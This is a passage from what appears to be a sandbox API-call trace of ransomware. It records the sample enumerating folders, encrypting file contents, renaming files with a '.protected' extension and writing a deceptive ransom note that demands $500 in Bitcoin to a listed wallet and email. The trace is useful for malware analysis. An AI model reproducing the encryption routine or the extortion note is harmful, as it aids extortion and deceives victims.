lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0086.915] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.915] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0086.916] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.916] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0086.916] WriteFile (in: hFile=0x150, 
lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0086.916] CloseHandle (hObject=0x150) returned 1 [0086.917] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini.protected") returned 111 [0086.917] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\desktop.ini.protected")) returned 1 [0086.919] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.919] lstrcmpiW (lpString1="index.dat", lpString2="Windows") returned -1 [0086.919] lstrcmpiW (lpString1="index.dat", lpString2="Program Files") returned -1 [0086.919] lstrcmpiW (lpString1="index.dat", lpString2="Program Files (x86)") returned -1 [0086.919] lstrcmpiW (lpString1="index.dat", lpString2="$Recycle.bin") returned 1 [0086.919] lstrcmpiW (lpString1="index.dat", lpString2="System Volume Information") returned -1 [0086.919] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat") returned 99 [0086.919] StrStrIW (lpFirst="index.dat", lpSrch=".protected") returned 0x0 [0086.919] lstrcmpW (lpString1="index.dat", lpString2="RESTORE_FILES.txt") returned -1 [0086.919] CryptGenRandom (in: 
hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0086.919] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0086.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.920] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat") returned 99 [0086.920] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0086.920] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat") returned 99 [0086.920] StrStrW (lpFirst="index.dat", lpSrch=".rar") returned 0x0 [0086.920] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat") returned 99 [0086.920] StrStrW (lpFirst="index.dat", lpSrch=".zip") returned 0x0 [0086.920] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0086.922] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.922] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, 
lpOverlapped=0x0) returned 1 [0086.923] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.923] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0086.923] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0086.923] CloseHandle (hObject=0x150) returned 1 [0086.924] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat.protected") returned 109 [0086.924] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat.protected")) returned 1 [0086.924] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.924] lstrcmpiW (lpString1="KETAJP6D", lpString2="Windows") returned -1 [0086.924] lstrcmpiW (lpString1="KETAJP6D", lpString2="Program Files") returned -1 [0086.924] lstrcmpiW (lpString1="KETAJP6D", lpString2="Program Files (x86)") returned -1 [0086.924] lstrcmpiW (lpString1="KETAJP6D", lpString2="$Recycle.bin") returned 1 [0086.924] lstrcmpiW (lpString1="KETAJP6D", lpString2="System Volume 
Information") returned -1 [0086.925] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D") returned 98 [0086.925] lstrcmpW (lpString1="KETAJP6D", lpString2=".") returned 1 [0086.925] lstrcmpW (lpString1="KETAJP6D", lpString2="..") returned 1 [0086.925] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\*") returned 100 [0086.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0086.925] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.925] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.925] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.925] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.925] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.925] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\.") returned 100 [0086.925] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.925] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0086.925] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0086.925] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.925] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.925] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ketajp6d\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.925] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.925] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.925] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.925] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.925] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.926] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.926] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\..") returned 101 [0086.926] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.926] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.926] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0086.926] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0086.926] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.926] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.926] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.926] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0086.926] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0086.926] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0086.926] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0086.926] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0086.926] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini") returned 110 [0086.926] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0086.926] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0086.926] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.926] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ketajp6d\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 
[0086.927] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini") returned 110 [0086.927] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0086.927] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini") returned 110 [0086.927] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0086.927] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini") returned 110 [0086.927] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0086.927] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x43, lpOverlapped=0x0) returned 1 [0086.928] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.928] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x43, lpOverlapped=0x0) returned 1 [0086.928] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.929] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0086.929] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0086.929] CloseHandle 
(hObject=0x154) returned 1 [0086.929] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini.protected") returned 120 [0086.929] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ketajp6d\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ketajp6d\\desktop.ini.protected")) returned 1 [0086.930] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0086.930] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0086.930] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\RESTORE_FILES.txt") returned 116 [0086.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ketajp6d\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.931] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.931] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0086.932] lstrlenA (lpString="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") returned 684 [0086.932] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 
[0086.932] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.932] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0086.932] CloseHandle (hObject=0x150) returned 1 [0086.932] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.932] lstrcmpiW (lpString1="VB18B0KB", lpString2="Windows") returned -1 [0086.932] lstrcmpiW (lpString1="VB18B0KB", lpString2="Program Files") returned 1 [0086.932] lstrcmpiW (lpString1="VB18B0KB", lpString2="Program Files (x86)") returned 1 [0086.932] lstrcmpiW (lpString1="VB18B0KB", lpString2="$Recycle.bin") returned 1 [0086.932] lstrcmpiW (lpString1="VB18B0KB", lpString2="System Volume Information") returned 1 [0086.932] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB") returned 98 [0086.932] lstrcmpW (lpString1="VB18B0KB", lpString2=".") returned 1 [0086.932] lstrcmpW (lpString1="VB18B0KB", lpString2="..") returned 1 [0086.932] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\*") returned 100 [0086.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0086.933] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.933] lstrcmpiW (lpString1=".", lpString2="Program Files") 
returned -1 [0086.933] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.933] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.933] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.933] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\.") returned 100 [0086.933] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.933] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0086.933] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0086.933] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.933] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.933] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\vb18b0kb\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.933] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.933] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.933] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.933] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.933] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.933] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.933] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\..") returned 101 [0086.933] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.933] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.933] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0086.933] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0086.933] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.934] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.934] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.934] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0086.934] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0086.934] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0086.934] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0086.934] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0086.934] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini") returned 110 [0086.934] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0086.934] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0086.934] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.934] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\vb18b0kb\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 
